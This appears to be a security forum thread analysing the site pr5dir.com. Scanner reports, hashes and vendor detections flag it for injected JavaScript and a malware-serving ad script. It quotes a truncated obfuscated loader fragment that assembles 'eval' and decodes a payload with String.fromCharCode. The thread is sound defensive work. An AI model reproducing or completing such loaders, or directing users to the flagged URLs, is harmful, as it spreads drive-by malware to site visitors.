Site fails injection check - potentially suspicious initialization method!

Injection Check: Suspicious Text after HTML

var date=new date(),pau=('ev'+date.getfullyear()).replace('2010','al');g=window[pau];sf=window['string'].fromcharcode;g(sf(4.5*2,59*2,48.5*
Flagged here as suspicious: http://app.webinspector.com/public/reports/show_website?site=http%3A%2F%2Fpr5dir.com WhatWeb info: htxp://pr5dir.com [200] PHP-Link-Directory[3.2.0], Meta-Author[PageRank 5 Directory / Cast-Iron Solutions LLC], MetaGenerator[PHP Link Directory 3.2.0], HTTPServer[LiteSpeed], PoweredBy[:], IP[173.193.201.151], PHP[5.3.28], Blocked external link: htxp://www.ppcadcenter.com/Openads/adx.js This URL is or was distributing a malware variant of JS/Kryptik.AGR trojan - status Up(nil): unknown_html on IP IDS for other domain on IP: http://urlquery.net/report.php?id=5912093 X-Powered-By[PHP/5.3.28], Cookies[PHPSESSID], Title[PageRank 5 Directory], Country[UNITED STATES][US]

Possible malware found: http://sucuri.net/malware/malware-entry-mwanomalysp8http://app.webinspector.com/public/reports/19853967
{ptential;ly suspicious files flagged by Quttera’s: http://www.quttera.com/detailed_report/pr5dir.com
view code: http://jsunpack.jeek.org/?report=b1461d8a81ed69acc97c204615e75fb8202ad7e4
Detected potentially suspicious initialization of function pointer to JavaScript method String.fromCharCode

polonus

Update: This is a suspicious page
Result for 2015-08-19 20:18:58 UTC
Website: -http://pr5dir.com
Checked URL: -http://pr5dir.com/
Suspicious iframes detected:
Object:-http://pr5dir.com/
SHA1: 94c4068b0ce8349eedcb1c52fdbee70d1d32b5bf
Name: TrojWare.JS.TrojanDownloader.Iframe.CQQ
See: https://www.virustotal.com/nl/url/088657b5c917550fd38140ea92e6a645755d9e6a583a65f98d7cf498d133041d/analysis/
Avast detects as JS:Decode-BW trojan in the java cache: http://1col.ru/www.pr5dir.com
Both the analyses of Sucuri and Quttera are blocked because too much of the code is given there.

polonus

P.S. Strange this destination is not blocked: -http://www.ppcadcenter.com/ conversant tracking…
But DrWeb blocks: -http://www.ppcadcenter.com/Openads/adx.js
Page blocked by Dr.Web Link Checker

Damian

:-\

pr5dir.com.htm
https://www.virustotal.com/en/file/15f5fd4bdde04e5800a1ae2715a6ed87d736868d381647ef479dd17aa5acc076/analysis/1440021686/

Sucuri https://sitecheck.sucuri.net/results/www.pr5dir.com

-http://[b]www.ppcadcenter.com[/b]/Openads/adx.js
Pay Per Click Advertising Guide

F-Secure reply

=================================================================================================================
The submitted website (pr5dir.com.htm) has been verified to be malicious and the appropriate rating is now updated. The update will take effect on the next product update cycle.